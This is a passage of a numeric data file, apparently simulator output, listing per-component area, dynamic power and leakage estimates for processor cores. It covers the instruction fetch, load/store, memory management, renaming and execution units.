'Instruction Fetch Unit/Branch Target Buffer/Peak Dynamic': 0.177867,
'Instruction Fetch Unit/Branch Target Buffer/Runtime Dynamic': 0.0139063,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage': 0.0811682,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage with power gating': 0.0435357,
'Instruction Fetch Unit/Gate Leakage': 0.0589979,
'Instruction Fetch Unit/Instruction Buffer/Area': 0.0226323,
'Instruction Fetch Unit/Instruction Buffer/Gate Leakage': 6.83558e-05,
'Instruction Fetch Unit/Instruction Buffer/Peak Dynamic': 0.606827,
'Instruction Fetch Unit/Instruction Buffer/Runtime Dynamic': 0.0490392,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage': 0.00151885,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage with power gating': 0.000701682,
'Instruction Fetch Unit/Instruction Cache/Area': 3.14635,
'Instruction Fetch Unit/Instruction Cache/Gate Leakage': 0.029931,
'Instruction Fetch Unit/Instruction Cache/Peak Dynamic': 3.11931,
'Instruction Fetch Unit/Instruction Cache/Runtime Dynamic': 0.164001,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage': 0.367022,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage with power gating': 0.180386,
'Instruction Fetch Unit/Instruction Decoder/Area': 1.85799,
'Instruction Fetch Unit/Instruction Decoder/Gate Leakage': 0.0222493,
'Instruction Fetch Unit/Instruction Decoder/Peak Dynamic': 1.37404,
'Instruction Fetch Unit/Instruction Decoder/Runtime Dynamic': 0.166559,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage': 0.442943,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage with power gating': 0.166104,
'Instruction Fetch Unit/Peak Dynamic': 5.48921,
'Instruction Fetch Unit/Runtime Dynamic': 0.398908,
'Instruction Fetch Unit/Subthreshold Leakage': 0.932286,
'Instruction Fetch Unit/Subthreshold Leakage with power gating': 0.40843,
'L2/Area': 4.53318,
'L2/Gate Leakage': 0.015464,
'L2/Peak Dynamic': 0.0403734,
'L2/Runtime Dynamic': 0.00826047,
'L2/Subthreshold Leakage': 0.834142,
'L2/Subthreshold Leakage with power gating': 0.401066,
'Load Store Unit/Area': 8.80901,
'Load Store Unit/Data Cache/Area': 6.84535,
'Load Store Unit/Data Cache/Gate Leakage': 0.0279261,
'Load Store Unit/Data Cache/Peak Dynamic': 2.90924,
'Load Store Unit/Data Cache/Runtime Dynamic': 0.812966,
'Load Store Unit/Data Cache/Subthreshold Leakage': 0.527675,
'Load Store Unit/Data Cache/Subthreshold Leakage with power gating': 0.25085,
'Load Store Unit/Gate Leakage': 0.0350888,
'Load Store Unit/LoadQ/Area': 0.0836782,
'Load Store Unit/LoadQ/Gate Leakage': 0.00059896,
'Load Store Unit/LoadQ/Peak Dynamic': 0.0540971,
'Load Store Unit/LoadQ/Runtime Dynamic': 0.054097,
'Load Store Unit/LoadQ/Subthreshold Leakage': 0.00941961,
'Load Store Unit/LoadQ/Subthreshold Leakage with power gating': 0.00536918,
'Load Store Unit/Peak Dynamic': 3.1647,
'Load Store Unit/Runtime Dynamic': 1.13385,
'Load Store Unit/StoreQ/Area': 0.322079,
'Load Store Unit/StoreQ/Gate Leakage': 0.00329971,
'Load Store Unit/StoreQ/Peak Dynamic': 0.133394,
'Load Store Unit/StoreQ/Runtime Dynamic': 0.266788,
'Load Store Unit/StoreQ/Subthreshold Leakage': 0.0345621,
'Load Store Unit/StoreQ/Subthreshold Leakage with power gating': 0.0197004,
'Load Store Unit/Subthreshold Leakage': 0.591321,
'Load Store Unit/Subthreshold Leakage with power gating': 0.283293,
'Memory Management Unit/Area': 0.4339,
'Memory Management Unit/Dtlb/Area': 0.0879726,
'Memory Management Unit/Dtlb/Gate Leakage': 0.00088729,
'Memory Management Unit/Dtlb/Peak Dynamic': 0.0473421,
'Memory Management Unit/Dtlb/Runtime Dynamic': 0.0478513,
'Memory Management Unit/Dtlb/Subthreshold Leakage': 0.0155699,
'Memory Management Unit/Dtlb/Subthreshold Leakage with power gating': 0.00887485,
'Memory Management Unit/Gate Leakage': 0.00808595,
'Memory Management Unit/Itlb/Area': 0.301552,
'Memory Management Unit/Itlb/Gate Leakage': 0.00393464,
'Memory Management Unit/Itlb/Peak Dynamic': 0.193947,
'Memory Management Unit/Itlb/Runtime Dynamic': 0.027173,
'Memory Management Unit/Itlb/Subthreshold Leakage': 0.0413758,
'Memory Management Unit/Itlb/Subthreshold Leakage with power gating': 0.0235842,
'Memory Management Unit/Peak Dynamic': 0.431382,
'Memory Management Unit/Runtime Dynamic': 0.0750243,
'Memory Management Unit/Subthreshold Leakage': 0.0766103,
'Memory Management Unit/Subthreshold Leakage with power gating': 0.0398333,
'Peak Dynamic': 17.011,
'Renaming Unit/Area': 0.303608,
'Renaming Unit/FP Front End RAT/Area': 0.131045,
'Renaming Unit/FP Front End RAT/Gate Leakage': 0.00351123,
'Renaming Unit/FP Front End RAT/Peak Dynamic': 2.51468,
'Renaming Unit/FP Front End RAT/Runtime Dynamic': 0.0355631,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage': 0.0308571,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage with power gating': 0.0175885,
'Renaming Unit/Free List/Area': 0.0340654,
'Renaming Unit/Free List/Gate Leakage': 2.5481e-05,
'Renaming Unit/Free List/Peak Dynamic': 0.0306032,
'Renaming Unit/Free List/Runtime Dynamic': 0.00785215,
'Renaming Unit/Free List/Subthreshold Leakage': 0.000370144,
'Renaming Unit/Free List/Subthreshold Leakage with power gating': 0.000201064,
'Renaming Unit/Gate Leakage': 0.00708398,
'Renaming Unit/Int Front End RAT/Area': 0.0941223,
'Renaming Unit/Int Front End RAT/Gate Leakage': 0.000283242,
'Renaming Unit/Int Front End RAT/Peak Dynamic': 0.731965,
'Renaming Unit/Int Front End RAT/Runtime Dynamic': 0.0837759,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage': 0.00435488,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage with power gating': 0.00248228,
'Renaming Unit/Peak Dynamic': 3.58947,
'Renaming Unit/Runtime Dynamic': 0.127191,
'Renaming Unit/Subthreshold Leakage': 0.0552466,
'Renaming Unit/Subthreshold Leakage with power gating': 0.0276461,
'Runtime Dynamic': 3.30187,
'Subthreshold Leakage': 6.16288,
'Subthreshold Leakage with power gating': 2.55328},
{'Area': 32.0201,
'Execution Unit/Area': 7.68434,
'Execution Unit/Complex ALUs/Area': 0.235435,
'Execution Unit/Complex ALUs/Gate Leakage': 0.0132646,
'Execution Unit/Complex ALUs/Peak Dynamic': 0.0105276,
'Execution Unit/Complex ALUs/Runtime Dynamic': 0.210958,
'Execution Unit/Complex ALUs/Subthreshold Leakage': 0.20111,
'Execution Unit/Complex ALUs/Subthreshold Leakage with power gating': 0.0754163,
'Execution Unit/Floating Point Units/Area': 4.6585,
'Execution Unit/Floating Point Units/Gate Leakage': 0.0656156,
'Execution Unit/Floating Point Units/Peak Dynamic': 0.0563895,
'Execution Unit/Floating Point Units/Runtime Dynamic': 0.304033,
'Execution Unit/Floating Point Units/Subthreshold Leakage': 0.994829,
'Execution Unit/Floating Point Units/Subthreshold Leakage with power gating': 0.373061,
'Execution Unit/Gate Leakage': 0.120359,
'Execution Unit/Instruction Scheduler/Area': 1.66526,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Area': 0.275653,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Gate Leakage': 0.000977433,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Peak Dynamic': 1.04181,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Runtime Dynamic': 0.170899,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage': 0.0143453,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage with power gating': 0.00810519,
'Execution Unit/Instruction Scheduler/Gate Leakage': 0.00568913,
'Execution Unit/Instruction Scheduler/Instruction Window/Area': 0.805223,
'Execution Unit/Instruction Scheduler/Instruction Window/Gate Leakage': 0.00414562,
'Execution Unit/Instruction Scheduler/Instruction Window/Peak Dynamic': 1.6763,
'Execution Unit/Instruction Scheduler/Instruction Window/Runtime Dynamic': 0.275654,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage': 0.0625755,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage with power gating': 0.0355964,
'Execution Unit/Instruction Scheduler/Peak Dynamic': 3.82262,
'Execution Unit/Instruction Scheduler/ROB/Area': 0.584388,
'Execution Unit/Instruction Scheduler/ROB/Gate Leakage': 0.00056608,
'Execution Unit/Instruction Scheduler/ROB/Peak Dynamic': 1.10451,
'Execution Unit/Instruction Scheduler/ROB/Runtime Dynamic': 0.139141,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage': 0.00906853,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage with power gating': 0.00364446,
'Execution Unit/Instruction Scheduler/Runtime Dynamic': 0.585694,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage': 0.0859892,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage with power gating': 0.047346,
'Execution Unit/Integer ALUs/Area': 0.47087,
'Execution Unit/Integer ALUs/Gate Leakage': 0.0265291,
'Execution Unit/Integer ALUs/Peak Dynamic': 0.186814,
'Execution Unit/Integer ALUs/Runtime Dynamic': 0.101344,
'Execution Unit/Integer ALUs/Subthreshold Leakage': 0.40222,
'Execution Unit/Integer ALUs/Subthreshold Leakage with power gating': 0.150833,
'Execution Unit/Peak Dynamic': 4.28804,
'Execution Unit/Register Files/Area': 0.570804,
'Execution Unit/Register Files/Floating Point RF/Area': 0.208131,
'Execution Unit/Register Files/Floating Point RF/Gate Leakage': 0.000232788,
'Execution Unit/Register Files/Floating Point RF/Peak Dynamic': 0.0106532,
'Execution Unit/Register Files/Floating Point RF/Runtime Dynamic': 0.00716827,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage': 0.00399698,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage with power gating': 0.00176968,
'Execution Unit/Register Files/Gate Leakage': 0.000622708,
'Execution Unit/Register Files/Integer RF/Area': 0.362673,
'Execution Unit/Register Files/Integer RF/Gate Leakage': 0.00038992,
'Execution Unit/Register Files/Integer RF/Peak Dynamic': 0.0557959,
'Execution Unit/Register Files/Integer RF/Runtime Dynamic': 0.0530138,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage': 0.00614175,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage with power gating': 0.00246675,
'Execution Unit/Register Files/Peak Dynamic': 0.0664491,
'Execution Unit/Register Files/Runtime Dynamic': 0.0601821,
'Execution Unit/Register Files/Subthreshold Leakage': 0.0101387,
'Execution Unit/Register Files/Subthreshold Leakage with power gating': 0.00423643,
'Execution Unit/Results Broadcast Bus/Area Overhead': 0.0390912,
'Execution Unit/Results Broadcast Bus/Gate Leakage': 0.00537402,
'Execution Unit/Results Broadcast Bus/Peak Dynamic': 0.120179,
'Execution Unit/Results Broadcast Bus/Runtime Dynamic': 0.323037,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage': 0.081478,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage with power gating': 0.0305543,
'Execution Unit/Runtime Dynamic': 1.58525,
'Execution Unit/Subthreshold Leakage': 1.79543,
'Execution Unit/Subthreshold Leakage with power gating': 0.688821,
'Gate Leakage': 0.368936,
'Instruction Fetch Unit/Area': 5.85939,
'Instruction Fetch Unit/Branch Predictor/Area': 0.138516,
'Instruction Fetch Unit/Branch Predictor/Chooser/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Chooser/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Chooser/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Chooser/Runtime Dynamic': 0.00169386,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/Gate Leakage': 0.000757657,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Runtime Dynamic': 0.00169386,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Area': 0.0257064,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Gate Leakage': 0.000154548,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Peak Dynamic': 0.0142575,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Runtime Dynamic': 0.00151699,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage': 0.00384344,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage with power gating': 0.00198631,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Area': 0.0151917,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Gate Leakage': 8.00196e-05,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Peak Dynamic': 0.00527447,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Runtime Dynamic': 0.000610028,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage': 0.00181347,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage with power gating': 0.000957045,
'Instruction Fetch Unit/Branch Predictor/Peak Dynamic': 0.0597838,
'Instruction Fetch Unit/Branch Predictor/RAS/Area': 0.0105732,
'Instruction Fetch Unit/Branch Predictor/RAS/Gate Leakage': 4.63858e-05,
'Instruction Fetch Unit/Branch Predictor/RAS/Peak Dynamic': 0.0117602,
'Instruction Fetch Unit/Branch Predictor/RAS/Runtime Dynamic': 0.000761547,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage': 0.000932505,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage with power gating': 0.000494733,
'Instruction Fetch Unit/Branch Predictor/Runtime Dynamic': 0.00566627,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage': 0.0199703,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage with power gating': 0.0103282,
'Instruction Fetch Unit/Branch Target Buffer/Area': 0.64954,
'Instruction Fetch Unit/Branch Target Buffer/Gate Leakage': 0.00272758,
'Instruction Fetch Unit/Branch Target Buffer/Peak Dynamic': 0.177867,
'Instruction Fetch Unit/Branch Target Buffer/Runtime Dynamic': 0.0147528,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage': 0.0811682,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage with power gating': 0.0435357,
'Instruction Fetch Unit/Gate Leakage': 0.0589979,
'Instruction Fetch Unit/Instruction Buffer/Area': 0.0226323,
'Instruction Fetch Unit/Instruction Buffer/Gate Leakage': 6.83558e-05,
'Instruction Fetch Unit/Instruction Buffer/Peak Dynamic': 0.606827,
'Instruction Fetch Unit/Instruction Buffer/Runtime Dynamic': 0.0509635,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage': 0.00151885,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage with power gating': 0.000701682,
'Instruction Fetch Unit/Instruction Cache/Area': 3.14635,
'Instruction Fetch Unit/Instruction Cache/Gate Leakage': 0.029931,
'Instruction Fetch Unit/Instruction Cache/Peak Dynamic': 3.24172,
'Instruction Fetch Unit/Instruction Cache/Runtime Dynamic': 0.178413,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage': 0.367022,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage with power gating': 0.180386,
'Instruction Fetch Unit/Instruction Decoder/Area': 1.85799,
'Instruction Fetch Unit/Instruction Decoder/Gate Leakage': 0.0222493,
'Instruction Fetch Unit/Instruction Decoder/Peak Dynamic': 1.37404,
'Instruction Fetch Unit/Instruction Decoder/Runtime Dynamic': 0.173095,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage': 0.442943,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage with power gating': 0.166104,
'Instruction Fetch Unit/Peak Dynamic': 5.61756,
'Instruction Fetch Unit/Runtime Dynamic': 0.42289,
'Instruction Fetch Unit/Subthreshold Leakage': 0.932286,
'Instruction Fetch Unit/Subthreshold Leakage with power gating': 0.40843,
'L2/Area': 4.53318,
'L2/Gate Leakage': 0.015464,
'L2/Peak Dynamic': 0.0480074,
'L2/Runtime Dynamic': 0.0107323,
'L2/Subthreshold Leakage': 0.834142,
'L2/Subthreshold Leakage with power gating': 0.401066,
'Load Store Unit/Area': 8.80901,
'Load Store Unit/Data Cache/Area': 6.84535,
'Load Store Unit/Data Cache/Gate Leakage': 0.0279261,
'Load Store Unit/Data Cache/Peak Dynamic': 2.89098,
'Load Store Unit/Data Cache/Runtime Dynamic': 0.807362,
'Load Store Unit/Data Cache/Subthreshold Leakage': 0.527675,
'Load Store Unit/Data Cache/Subthreshold Leakage with power gating': 0.25085,
'Load Store Unit/Gate Leakage': 0.0350888,
'Load Store Unit/LoadQ/Area': 0.0836782,
'Load Store Unit/LoadQ/Gate Leakage': 0.00059896,
'Load Store Unit/LoadQ/Peak Dynamic': 0.0535062,
'Load Store Unit/LoadQ/Runtime Dynamic': 0.0535061,
'Load Store Unit/LoadQ/Subthreshold Leakage': 0.00941961,
'Load Store Unit/LoadQ/Subthreshold Leakage with power gating': 0.00536918,
'Load Store Unit/Peak Dynamic': 3.14364,
'Load Store Unit/Runtime Dynamic': 1.12474,
'Load Store Unit/StoreQ/Area': 0.322079,
'Load Store Unit/StoreQ/Gate Leakage': 0.00329971,
'Load Store Unit/StoreQ/Peak Dynamic': 0.131937,
'Load Store Unit/StoreQ/Runtime Dynamic': 0.263874,
'Load Store Unit/StoreQ/Subthreshold Leakage': 0.0345621,
'Load Store Unit/StoreQ/Subthreshold Leakage with power gating': 0.0197004,
'Load Store Unit/Subthreshold Leakage': 0.591321,
'Load Store Unit/Subthreshold Leakage with power gating': 0.283293,
'Memory Management Unit/Area': 0.4339,
'Memory Management Unit/Dtlb/Area': 0.0879726,
'Memory Management Unit/Dtlb/Gate Leakage': 0.00088729,
'Memory Management Unit/Dtlb/Peak Dynamic': 0.0468249,
'Memory Management Unit/Dtlb/Runtime Dynamic': 0.047449,
'Memory Management Unit/Dtlb/Subthreshold Leakage': 0.0155699,
'Memory Management Unit/Dtlb/Subthreshold Leakage with power gating': 0.00887485,
'Memory Management Unit/Gate Leakage': 0.00808595,
'Memory Management Unit/Itlb/Area': 0.301552,
'Memory Management Unit/Itlb/Gate Leakage': 0.00393464,
'Memory Management Unit/Itlb/Peak Dynamic': 0.201558,
'Memory Management Unit/Itlb/Runtime Dynamic': 0.0295351,
'Memory Management Unit/Itlb/Subthreshold Leakage': 0.0413758,
'Memory Management Unit/Itlb/Subthreshold Leakage with power gating': 0.0235842,
'Memory Management Unit/Peak Dynamic': 0.438104,
'Memory Management Unit/Runtime Dynamic': 0.0769841,
'Memory Management Unit/Subthreshold Leakage': 0.0766103,
'Memory Management Unit/Subthreshold Leakage with power gating': 0.0398333,
'Peak Dynamic': 17.1248,
'Renaming Unit/Area': 0.303608,
'Renaming Unit/FP Front End RAT/Area': 0.131045,
'Renaming Unit/FP Front End RAT/Gate Leakage': 0.00351123,
'Renaming Unit/FP Front End RAT/Peak Dynamic': 2.51468,
'Renaming Unit/FP Front End RAT/Runtime Dynamic': 0.0280241,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage': 0.0308571,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage with power gating': 0.0175885,
'Renaming Unit/Free List/Area': 0.0340654,
'Renaming Unit/Free List/Gate Leakage': 2.5481e-05,
'Renaming Unit/Free List/Peak Dynamic': 0.0306032,
'Renaming Unit/Free List/Runtime Dynamic': 0.00805154,
'Renaming Unit/Free List/Subthreshold Leakage': 0.000370144,
'Renaming Unit/Free List/Subthreshold Leakage with power gating': 0.000201064,
'Renaming Unit/Gate Leakage': 0.00708398,
'Renaming Unit/Int Front End RAT/Area': 0.0941223,
'Renaming Unit/Int Front End RAT/Gate Leakage': 0.000283242,
'Renaming Unit/Int Front End RAT/Peak Dynamic': 0.731965,
'Renaming Unit/Int Front End RAT/Runtime Dynamic': 0.0873152,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage': 0.00435488,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage with power gating': 0.00248228,
'Renaming Unit/Peak Dynamic': 3.58947,
'Renaming Unit/Runtime Dynamic': 0.123391,
'Renaming Unit/Subthreshold Leakage': 0.0552466,
'Renaming Unit/Subthreshold Leakage with power gating': 0.0276461,
'Runtime Dynamic': 3.34399,
'Subthreshold Leakage': 6.16288,
'Subthreshold Leakage with power gating': 2.55328},
{'Area': 32.0201,
'Execution Unit/Area': 7.68434,
'Execution Unit/Complex ALUs/Area': 0.235435,
'Execution Unit/Complex ALUs/Gate Leakage': 0.0132646,
'Execution Unit/Complex ALUs/Peak Dynamic': 0.00646735,
'Execution Unit/Complex ALUs/Runtime Dynamic': 0.207769,
'Execution Unit/Complex ALUs/Subthreshold Leakage': 0.20111,
'Execution Unit/Complex ALUs/Subthreshold Leakage with power gating': 0.0754163,
'Execution Unit/Floating Point Units/Area': 4.6585,
'Execution Unit/Floating Point Units/Gate Leakage': 0.0656156,
'Execution Unit/Floating Point Units/Peak Dynamic': 0.0346438,
'Execution Unit/Floating Point Units/Runtime Dynamic': 0.304033,
'Execution Unit/Floating Point Units/Subthreshold Leakage': 0.994829,
'Execution Unit/Floating Point Units/Subthreshold Leakage with power gating': 0.373061,
'Execution Unit/Gate Leakage': 0.120359,
'Execution Unit/Instruction Scheduler/Area': 1.66526,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Area': 0.275653,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Gate Leakage': 0.000977433,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Peak Dynamic': 1.04181,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Runtime Dynamic': 0.184462,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage': 0.0143453,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage with power gating': 0.00810519,
'Execution Unit/Instruction Scheduler/Gate Leakage': 0.00568913,
'Execution Unit/Instruction Scheduler/Instruction Window/Area': 0.805223,
'Execution Unit/Instruction Scheduler/Instruction Window/Gate Leakage': 0.00414562,
'Execution Unit/Instruction Scheduler/Instruction Window/Peak Dynamic': 1.6763,
'Execution Unit/Instruction Scheduler/Instruction Window/Runtime Dynamic': 0.29753,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage': 0.0625755,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage with power gating': 0.0355964,
'Execution Unit/Instruction Scheduler/Peak Dynamic': 3.82262,
'Execution Unit/Instruction Scheduler/ROB/Area': 0.584388,
'Execution Unit/Instruction Scheduler/ROB/Gate Leakage': 0.00056608,
'Execution Unit/Instruction Scheduler/ROB/Peak Dynamic': 1.10451,
'Execution Unit/Instruction Scheduler/ROB/Runtime Dynamic': 0.150183,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage': 0.00906853,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage with power gating': 0.00364446,
'Execution Unit/Instruction Scheduler/Runtime Dynamic': 0.632175,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage': 0.0859892,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage with power gating': 0.047346,
'Execution Unit/Integer ALUs/Area': 0.47087,
'Execution Unit/Integer ALUs/Gate Leakage': 0.0265291,
'Execution Unit/Integer ALUs/Peak Dynamic': 0.205658,
'Execution Unit/Integer ALUs/Runtime Dynamic': 0.101344,
'Execution Unit/Integer ALUs/Subthreshold Leakage': 0.40222,
'Execution Unit/Integer ALUs/Subthreshold Leakage with power gating': 0.150833,
'Execution Unit/Peak Dynamic': 4.28652,
'Execution Unit/Register Files/Area': 0.570804,
'Execution Unit/Register Files/Floating Point RF/Area': 0.208131,
'Execution Unit/Register Files/Floating Point RF/Gate Leakage': 0.000232788,
'Execution Unit/Register Files/Floating Point RF/Peak Dynamic': 0.00654495,
'Execution Unit/Register Files/Floating Point RF/Runtime Dynamic': 0.00773715,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage': 0.00399698,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage with power gating': 0.00176968,
'Execution Unit/Register Files/Gate Leakage': 0.000622708,
'Execution Unit/Register Files/Integer RF/Area': 0.362673,
'Execution Unit/Register Files/Integer RF/Gate Leakage': 0.00038992,
'Execution Unit/Register Files/Integer RF/Peak Dynamic': 0.0583819,
'Execution Unit/Register Files/Integer RF/Runtime Dynamic': 0.057221,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage': 0.00614175,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage with power gating': 0.00246675,
'Execution Unit/Register Files/Peak Dynamic': 0.0649268,
'Execution Unit/Register Files/Runtime Dynamic': 0.0649582,
'Execution Unit/Register Files/Subthreshold Leakage': 0.0101387,
'Execution Unit/Register Files/Subthreshold Leakage with power gating': 0.00423643,
'Execution Unit/Results Broadcast Bus/Area Overhead': 0.0390912,
'Execution Unit/Results Broadcast Bus/Gate Leakage': 0.00537402,
'Execution Unit/Results Broadcast Bus/Peak Dynamic': 0.124611,
'Execution Unit/Results Broadcast Bus/Runtime Dynamic': 0.333729,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage': 0.081478,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage with power gating': 0.0305543,
'Execution Unit/Runtime Dynamic': 1.64401,
'Execution Unit/Subthreshold Leakage': 1.79543,
'Execution Unit/Subthreshold Leakage with power gating': 0.688821,
'Gate Leakage': 0.368936,
'Instruction Fetch Unit/Area': 5.85939,
'Instruction Fetch Unit/Branch Predictor/Area': 0.138516,
'Instruction Fetch Unit/Branch Predictor/Chooser/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Chooser/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Chooser/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Chooser/Runtime Dynamic': 0.00204448,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/Gate Leakage': 0.000757657,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Runtime Dynamic': 0.00204448,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Area': 0.0257064,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Gate Leakage': 0.000154548,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Peak Dynamic': 0.0142575,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Runtime Dynamic': 0.00183145,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage': 0.00384344,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage with power gating': 0.00198631,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Area': 0.0151917,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Gate Leakage': 8.00196e-05,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Peak Dynamic': 0.00527447,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Runtime Dynamic': 0.000736725,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage': 0.00181347,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage with power gating': 0.000957045,
'Instruction Fetch Unit/Branch Predictor/Peak Dynamic': 0.0597838,
'Instruction Fetch Unit/Branch Predictor/RAS/Area': 0.0105732,
'Instruction Fetch Unit/Branch Predictor/RAS/Gate Leakage': 4.63858e-05,
'Instruction Fetch Unit/Branch Predictor/RAS/Peak Dynamic': 0.0117602,
'Instruction Fetch Unit/Branch Predictor/RAS/Runtime Dynamic': 0.000821984,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage': 0.000932505,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage with power gating': 0.000494733,
'Instruction Fetch Unit/Branch Predictor/Runtime Dynamic': 0.00674239,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage': 0.0199703,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage with power gating': 0.0103282,
'Instruction Fetch Unit/Branch Target Buffer/Area': 0.64954,
